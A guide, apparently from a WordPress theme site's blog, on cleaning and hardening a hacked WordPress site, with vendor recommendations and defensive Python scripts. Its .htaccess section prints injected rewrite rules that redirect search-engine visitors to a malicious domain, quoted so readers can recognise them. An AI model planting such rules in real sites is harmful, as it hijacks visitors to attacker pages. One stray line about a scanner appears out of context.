How to Recover a Hacked WordPress Website

One word we never want to hear is "hacked." Yet it is common with WordPress websites that are not looked after properly.

WordPress is the most widely used content management system in the world. The sheer volume also makes it the most targeted platform. It is very stressful to get your WordPress website hacked.

Here is a complete and comprehensive guide for the worst scenarios. Sometimes attackers manage to penetrate your website, no matter how security conscious you are.
So let us check out how we can clean our hacked WordPress website.

Do Not Freak Out

The first step is as simple as that. Take a deep breath. Stress and anger will only make the situation worse. Keeping your composure will help you come up with the best possible strategy. Try to put all your energy into finding the solution, rather than stressing out.

Find out the Hack

Carefully examine the scenario and take some notes. What is happening? Are you unable to log in to your WordPress admin dashboard? Alternatively, maybe your website is redirecting to another website.

Are there any illegal links on your website? Is your website already marked insecure by Google?
Make your notes in the light of the answers to these questions. These notes will help you in the steps that follow.

Get in Touch with your Hosting Company

Most hosting companies cooperate on these issues. They have experienced staff who can help you get everything back in order. Since they have faced these scenarios before, they are well equipped to help.

The first step is always to understand the problem. Our previous step was all about understanding the issue.
Once you know the core of your problem, you are ready to share it. If the incident is a hacked WordPress website, the hosting company should be the first party you share it with. Get in touch with them and do as they say.

What if your website is hosted on a shared server? You can check whether a hacker accessed your website through another site that shares the server. Your hosting provider can tell you more details about the incident.

How did the perpetrator hack your website? Which loophole did they use? How did it spread?

Try to Restore Your Previous Version

Do you have the habit of backing up your website? If yes, you are safe. It would be best to restore an earlier version, from a point in time before the website was hacked.

Please note that your entire website will revert to that point in time. Any updates you made after that will be lost, be it images, posts, general changes or anything else.

However, when you need to clean a hacked WordPress website, that loss matters little.
Once you recover through the backup, do not think you are free. Your website is still vulnerable to attacks. Now take proper security measures to make sure that it never happens again.

Your recent changes might be valuable and you may not want to lose them. Then it is okay not to restore from the backup. There are other ways around.

Consult the Professional

Security is a serious matter. Hiring professionals is the best way to go if your WordPress website is hacked. Compromised websites get worse and worse with passing time. Get professional help as soon as possible.

It is the best solution if you are not tech-savvy, or if you want to be extra cautious, which is actually wise in this case.

Ask for support if you do not find yourself ready to make changes in the backend of your website. Not everyone is comfortable dealing with code and servers.

Hackers usually hide their scripts in more than one location to smooth the way for their next visit.

A Few Good Solution Providers

Security professionals usually charge more than 100 dollars per hour. That would be too much for small businesses to bear. Do not fret; there are other ways out.

The best solution is Sucuri. They offer malware and hack cleanup for $199 that also includes their firewall and monitoring service for a whole year.

Another great option is Malcare. This is an ultimate WordPress security solution to protect your website in an online environment. It makes sure that your business is always protected and available for visitors.

  • Wordfence helps to fix unlimited pages on a single site for $179.
  • OneHourSiteFix assists in cleaning infected sites in one hour.
  • Jim Walker helps you to clean the hacked site quickly. Jim is available on a call for consulting.
  • wpfixit: 24/7 instant WordPress support.
  • Fix My Site begins from as low as $99 to repair sites.

The powerful scanner does not slow down your website. It goes beyond just signature matching to find new and complex malware that usually goes undetected by other popular scanners.

Trusted WordPress Themes & Plugins

Themes and plugins are the building blocks of the WordPress website. Ensure that you always install trusted WordPress themes and plugins.

Keep updating them. If you fail to update and a hacker takes advantage of security loopholes in outdated versions, you cannot blame anyone but yourself.

Inactive WordPress themes and plugins are among hackers' favorite weapons. This is where they hide their backdoors.

A backdoor is a method of bypassing normal authentication and gaining the ability to remotely access the server while remaining undetected.

This way a hacker can regain access even after you remove the malicious plugin.
To ensure you have trusted WordPress themes, install Theme Authenticity Checker. If there is any malicious code in your themes, it will detect it and name the infected file.

You can either manually remove the code or replace the file with the original one. Upload brand new WordPress files from a fresh download.

Also, try your best to install trusted WordPress themes, rather than unreliable ones.

Check the User Permissions

Do not forget to check the permissions of all your users. Kindly double-check them. If you find any suspicious new users, remove them immediately. Only you and your trusted team should have access to admin accounts.

The Passwords & Secret Keys

Are you sure you have changed all passwords related to your WordPress website? Be clear about what it includes.
It includes the password to access your WP dashboard, cPanel, MySQL database, and FTP. Any other password that can help someone access your website is included.

The password should be strong and unique. It should be difficult for hackers or bots to guess. An ideal password is a combination of characters and numbers. It is not any real word. Randomness is the ultimate option here. If you find it difficult to come up with a random password, take help from any good password generator tool.

To ensure the safety and security of your WordPress website, change your secret keys. If you want to streamline this, install the iThemes Security Plugin. That makes the whole procedure easy and simple.

All these tips would help you restore or clean your WordPress website. That is not all. The road goes on.
WordPress security is a never-ending process. Today, you have to take security measures on a daily basis to keep hardening your WordPress website.
Information security is not a one-time task; rather, it is a lifestyle.

WordPress Security is a constant effort. Hackers will never stop trying, neither should you.
It is time to take security in your hands.

Change FTP, cPanel & MySQL Passwords

Regaining full control over your website after a hacker attack isn't that difficult, but it can be scary or feel chaotic if you have never done it before. We strongly encourage everyone to update their cPanel, FTP and MySQL passwords to further improve security.

Clear .htaccess

You can do a quick outside spot check using Google’s Safe Browsing diagnostic page to see if they’ve detected anything malicious on your site in their most recent crawl. You would simply want to replace example.com with your actual domain name in the diagnostic page URL.

We often see hacked sites handle redirects and actions that are specified in the .htaccess file. Injected rules like the following send visitors who arrive from a search engine to a malicious domain:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
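
A way to spot rules like these automatically, as an added example that is not part of the original article: the script walks an .htaccess file and reports every RewriteRule that redirects to a host other than your own, noting whether referer or user-agent conditions guard it. The function name, the sample file and the example.com host are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: stock WordPress rules, an HTTPS redirect, injected rules.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
RewriteEngine On
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTPS} off
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
"""

COND = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
VISITOR_VARS = {"HTTP_REFERER", "HTTP_USER_AGENT"}


def find_offsite_redirects(text, own_host):
    """Return RewriteRules whose target is an absolute URL on a foreign host."""
    own_host = own_host.lower()
    findings, pending = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            pending.append(cond.group(1).upper())  # applies to the next rule
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        host = urlsplit(rule.group(1)).hostname or ""
        local = host == own_host or host.endswith("." + own_host)
        if host and not host.startswith("%") and not local:
            findings.append({
                "line": lineno,
                "target_host": host,
                # Such conditions hide the redirect from direct visits.
                "cloaked": bool(VISITOR_VARS & set(pending)),
            })
        pending = []  # a RewriteRule consumes the conditions above it
    return findings


if __name__ == "__main__":
    print(find_offsite_redirects(SAMPLE_HTACCESS, "example.com"))
```

A "cloaked" finding explains why the owner, who usually types the address in directly, may never see the redirect that search-engine visitors get.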

Replace WordPress System Files

To reset WordPress back to the default installation settings, download and remove all WordPress site files from your server except the /wp-content directory.

Next, you’re going to need to upload a blank WordPress installation (all files except the /wp-content directory) to the server, either via cPanel or FTP.

Update the wp-config.php file with your database credentials and salt keys.

Finally, sign into WordPress and reactivate desired plugins.
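
Before deleting the old files, it helps to know which of them were actually tampered with. The following is an added example, not part of the original article: it compares the copy of the site you downloaded against a fresh WordPress download, skipping /wp-content, and lists core files that were modified and files WordPress never shipped. It assumes the fresh download is the same WordPress version as the site; the function names and the small demo trees are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

SKIP_DIRS = {"wp-content"}                  # left in place by the steps above
SITE_ONLY = {"wp-config.php", ".htaccess"}  # site-specific: review by hand


def core_files(root):
    """Map relative path -> SHA-256 for every file outside SKIP_DIRS."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file() and p.relative_to(root).parts[0] not in SKIP_DIRS
    }


def compare_with_fresh(site_root, fresh_root):
    """Classify the live site's files against a clean copy of the same version."""
    site, fresh = core_files(site_root), core_files(fresh_root)
    report = {"modified": [], "unknown": [], "review": []}
    for rel, digest in sorted(site.items()):
        if rel in SITE_ONLY:
            report["review"].append(rel)
        elif rel not in fresh:
            report["unknown"].append(rel)    # WordPress does not ship this file
        elif digest != fresh[rel]:
            report["modified"].append(rel)   # a core file was altered
    return report


def demo():  # runs the comparison on two small constructed trees
    clean = {"index.php": "<?php // core", "wp-includes/load.php": "<?php // load"}
    hacked = {**clean,
              "wp-includes/load.php": "<?php // load, plus an injected line",
              "wp-includes/cache-x.php": "<?php // dropped by the intruder",
              "wp-config.php": "<?php // credentials",
              "wp-content/uploads/logo.png": "image"}
    with tempfile.TemporaryDirectory() as site, tempfile.TemporaryDirectory() as fresh:
        for root, tree in ((site, hacked), (fresh, clean)):
            for rel, text in tree.items():
                path = Path(root, rel)
                path.parent.mkdir(parents=True, exist_ok=True)
                path.write_text(text)
        return compare_with_fresh(site, fresh)


if __name__ == "__main__":
    print(demo())
```

The "unknown" and "modified" lists are also useful notes for your hosting company, since they show where the intruder left files.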

How to harden your WordPress website?

In the first place, no security measure is better than having a backup solution. If you do not have one, arrange it somehow.
Beyond that, you can follow some basic tips to avoid incidents. Aside from backups, the following are some useful practices.

  • Firewall and Monitoring System – Both of these things are mandatory. Most experts recommend the Sucuri plugin for this. It blocks attacks before they reach your server in most cases.
  • Managed WordPress Hosting – This is a good option. Managed hosts perform much better when it comes to security. The two most recommended options are Pagely and WPEngine.
  • Try to disable theme and plugin editors – This is very good practice. Disable file editing in WordPress, so no one can mess with your files.
  • Limit the Login Attempts – Limiting login attempts is the ultimate security measure against brute force attacks.
  • The Admin Directory – It is the most important part of the website. Protect it with a password. It adds an additional password layer to your WordPress admin area. Think of it as a double lock.
  • Disable PHP Execution – You must disable PHP execution in certain directories. This also acts as an additional layer of security.
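
Two of these tips can be checked from the files themselves. The following is an added example, not part of the original article: it reads wp-config.php for WordPress's DISALLOW_FILE_EDIT constant and reads the .htaccess of the uploads directory for a rule that denies access to PHP files, which is a common way to stop PHP execution there on Apache. The function name and both sample files are constructed; choosing the uploads directory and assuming an Apache server that honours .htaccess are assumptions of this example.

```python
import re

# Constructed samples, not taken from a real site. Note that the define
# in this wp-config.php is commented out, so the editor is still enabled.
WP_CONFIG = """<?php
define('DB_NAME', 'wp');
// define('DISALLOW_FILE_EDIT', true);
"""
UPLOADS_HTACCESS = """<Files *.php>
deny from all
</Files>
"""

FILE_EDIT_OFF = re.compile(
    r"""^\s*define\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)\s*;""",
    re.I | re.M)
PHP_BLOCK = re.compile(
    r"<Files(?:Match)?\s+[^>]*php[^>]*>(.*?)</Files(?:Match)?>", re.I | re.S)
# Apache 2.2 and 2.4 spellings of "refuse every request".
DENY = re.compile(r"^\s*(deny\s+from\s+all|Require\s+all\s+denied)\s*$",
                  re.I | re.M)


def audit_hardening(wp_config, uploads_htaccess):
    """Return a list of hardening steps that are missing."""
    findings = []
    if not FILE_EDIT_OFF.search(wp_config):
        findings.append("theme/plugin editor enabled: "
                        "DISALLOW_FILE_EDIT is not set to true")
    blocks = PHP_BLOCK.findall(uploads_htaccess or "")
    if not any(DENY.search(block) for block in blocks):
        findings.append("PHP can execute in uploads: "
                        "no deny rule covers *.php")
    return findings


if __name__ == "__main__":
    for finding in audit_hardening(WP_CONFIG, UPLOADS_HTACCESS):
        print(finding)
```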

Wrapping it up

We hope that this article helped you fix your hacked WordPress website. If you are still running into problems, we recommend getting expert help. WordPress security can seem daunting, but a little care can really help you.

Editorial Staff

aThemeArt Editorial Staff prepares and cooks all the content that is published on athemeart.com. They are responsible for all types of web content including blog, social posts, videos, documentation, etc.
